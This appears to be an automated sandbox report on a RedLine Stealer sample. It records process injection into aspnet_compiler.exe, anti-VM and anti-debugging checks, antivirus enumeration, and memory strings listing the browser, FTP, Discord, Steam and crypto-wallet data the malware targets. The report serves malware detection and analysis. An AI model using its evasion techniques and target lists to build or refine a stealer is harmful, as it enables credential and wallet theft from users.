Source: 0.0.StZAEFSb2j.exe.5d0000.0.unpack, u206e????????????????????????????????????????.cs	.Net Code: ????????????????????????????????????????? System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 1_2_06208010 push es; ret

1_2_06208020

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49697 -> 6008
Source: unknown	Network traffic detected: HTTP traffic on port 6008 -> 49697
Source: unknown	Network traffic detected: HTTP traffic on port 6008 -> 49697
Source: unknown	Network traffic detected: HTTP traffic on port 49697 -> 6008
Source: unknown	Network traffic detected: HTTP traffic on port 6008 -> 49697
Source: unknown	Network traffic detected: HTTP traffic on port 6008 -> 49697
Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 6008
Source: unknown	Network traffic detected: HTTP traffic on port 6008 -> 49699
Source: unknown	Network traffic detected: HTTP traffic on port 6008 -> 49699
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 6008
Source: unknown	Network traffic detected: HTTP traffic on port 6008 -> 49700
Source: unknown	Network traffic detected: HTTP traffic on port 6008 -> 49700

Source: C:\Users\user\Desktop\StZAEFSb2j.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StZAEFSb2j.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StZAEFSb2j.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StZAEFSb2j.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StZAEFSb2j.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StZAEFSb2j.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StZAEFSb2j.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StZAEFSb2j.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StZAEFSb2j.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StZAEFSb2j.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StZAEFSb2j.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StZAEFSb2j.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StZAEFSb2j.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StZAEFSb2j.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StZAEFSb2j.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StZAEFSb2j.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StZAEFSb2j.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StZAEFSb2j.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StZAEFSb2j.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StZAEFSb2j.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StZAEFSb2j.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StZAEFSb2j.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StZAEFSb2j.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StZAEFSb2j.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StZAEFSb2j.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StZAEFSb2j.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StZAEFSb2j.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StZAEFSb2j.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StZAEFSb2j.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StZAEFSb2j.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StZAEFSb2j.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StZAEFSb2j.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StZAEFSb2j.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StZAEFSb2j.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StZAEFSb2j.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StZAEFSb2j.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Source: C:\Users\user\Desktop\StZAEFSb2j.exe TID: 5504	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\StZAEFSb2j.exe TID: 1236	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 1276	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\StZAEFSb2j.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Registry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Window / User API: threadDelayed 9604

Jump to behavior

Source: C:\Users\user\Desktop\StZAEFSb2j.exe

Code function: 0_2_00E430E0 sldt word ptr [ecx]

0_2_00E430E0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\StZAEFSb2j.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Users\user\Desktop\StZAEFSb2j.exe

Code function: 0_2_00E46310 CheckRemoteDebuggerPresent,

0_2_00E46310

Source: C:\Users\user\Desktop\StZAEFSb2j.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\StZAEFSb2j.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Users\user\Desktop\StZAEFSb2j.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Writes to foreign memory regions

Source: C:\Users\user\Desktop\StZAEFSb2j.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\StZAEFSb2j.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 402000	Jump to behavior
Source: C:\Users\user\Desktop\StZAEFSb2j.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 41A000	Jump to behavior
Source: C:\Users\user\Desktop\StZAEFSb2j.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 41C000	Jump to behavior
Source: C:\Users\user\Desktop\StZAEFSb2j.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: E09008	Jump to behavior

.NET source code references suspicious native API functions

Source: StZAEFSb2j.exe, u200f????????????????????????????????????????.cs	Reference to suspicious API methods: ('?????????????????????????????????????????', 'OpenProcess@kernel32.dll'), ('?????????????????????????????????????????', 'LoadLibrary@kernel32.dll'), ('?????????????????????????????????????????', 'GetProcAddress@kernel32.dll')
Source: 0.0.StZAEFSb2j.exe.5d0000.0.unpack, u200f????????????????????????????????????????.cs	Reference to suspicious API methods: ('?????????????????????????????????????????', 'OpenProcess@kernel32.dll'), ('?????????????????????????????????????????', 'LoadLibrary@kernel32.dll'), ('?????????????????????????????????????????', 'GetProcAddress@kernel32.dll')
Source: 1.0.aspnet_compiler.exe.400000.0.unpack, NativeHelper.cs	Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\StZAEFSb2j.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\StZAEFSb2j.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\StZAEFSb2j.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Jump to behavior

Source: StZAEFSb2j.exe, 00000000.00000002.318741873.0000000002ACA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: StZAEFSb2j.exe, 00000000.00000002.318741873.0000000002ACA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Progman

Source: C:\Users\user\Desktop\StZAEFSb2j.exe	Queries volume information: C:\Users\user\Desktop\StZAEFSb2j.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\StZAEFSb2j.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 0.2.StZAEFSb2j.exe.42f9000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.StZAEFSb2j.exe.42f9000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.321721404.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.316565039.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.415555604.0000000002FAF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: StZAEFSb2j.exe PID: 780, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: aspnet_compiler.exe PID: 1592, type: MEMORYSTR

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\			Jump to behavior

Found many strings related to Crypto-Wallets (likely being stolen)

Source: StZAEFSb2j.exe, 00000000.00000002.321721404.00000000042B9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: [^\u0020-\u007F]ProcessIdname_on_cardencrypted_valuehttps://ipinfo.io/ip%appdata%\logins{0}\FileZilla\recentservers.xml%appdata%\discord\Local Storage\leveldb\tdataAtomicWalletv10/C \EtFile.IOhereuFile.IOm\walFile.IOletsESystem.UItherSystem.UIeumElectrum[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}profiles\Windows\valueexpiras21ation_moas21nth
Source: aspnet_compiler.exe, 00000001.00000002.436889284.0000000006526000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Win32_Process.Handle="3124"oaming\Electrum\wallets\*
Source: StZAEFSb2j.exe, 00000000.00000002.321721404.00000000042B9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlitessfnExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxeWinhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry.vstring.ReplacedfJaxxpathBSJB
